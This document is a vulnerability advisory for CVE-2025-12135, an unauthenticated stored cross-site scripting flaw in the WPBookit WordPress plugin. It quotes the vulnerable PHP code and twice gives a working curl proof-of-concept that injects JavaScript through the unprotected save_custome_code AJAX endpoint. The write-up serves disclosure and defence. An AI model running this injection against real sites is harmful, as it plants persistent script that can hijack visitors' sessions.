WPBookit <= 1.0.6 - Unauthenticated Stored Cross-Site Scripting

November 20, 2025 - 2 mins read

CVE-2025-12135

The WPBookit plugin does not validate user permission or sanitize custom CSS/JS code in its save_custome_code AJAX endpoint, allowing unauthenticated attackers to inject arbitrary JavaScript that executes on every page load, leading to stored XSS and potential session hijacking.

TL;DR Exploits

# Basic XSS injection
curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

Details

The vulnerability exists in the save_custome_code method of the WPB_Setting_Controller class. The plugin registers AJAX endpoints for unauthenticated users, allowing any visitor to inject arbitrary CSS/JS code that gets executed on every page load.

Vulnerable code from /core/admin/classes/controllers/class.wpb-setting-controller.php:16-25:

public function save_custome_code(WP_REST_Request $request){
    $css_code= $request->get_param('css_code');
    $js_code= $request->get_param('js_code');
    update_option( 'wpb_custom_code_data', [  'css_code' => $css_code,  'js_code' => $js_code ]);
}

Code execution from /core/shortcodes/class-wpbookit-shortcode-abstract.php:20-27:

$wpb_custom_code= get_option( 'wpb_custom_code_data', [  'css_code' => '',  'js_code' => '' ]);

wp_add_inline_style( 'wpb-custom-code-css', stripslashes($wpb_custom_code['css_code']));
wp_add_inline_script( 'wpb-custom-code-js', stripslashes($wpb_custom_code['js_code']) );

Unauthenticated access from /core/admin/classes/class.wpb-admin-routes-handler.php:15-16:

add_action( "wp_ajax_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );
add_action( "wp_ajax_nopriv_wpb_ajax_post", [ $this, 'wpb_ajax_post' ] );

Route configuration from /core/admin/classes/class.wpb-admin-routes.php:118-123:

'save_custome_code' => [
    'method' => 'post',
    'action' => 'WPB_Setting_Controller@save_custome_code',
    'nonce' => 0,
    'module' => 'setting-controller'
],

Manual Reproduction

Identify target with WPBookit plugin installed
Inject malicious JavaScript:

curl -X POST "http://localhost:1337/wp-admin/admin-ajax.php?action=wpb_ajax_post&route_name=save_custome_code" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "css_code=/* malicious */&js_code=alert('XSS');"

Verify injection by visiting any page on the site - the alert will execute
Check persistence - the malicious code is stored in the database and executes on every page load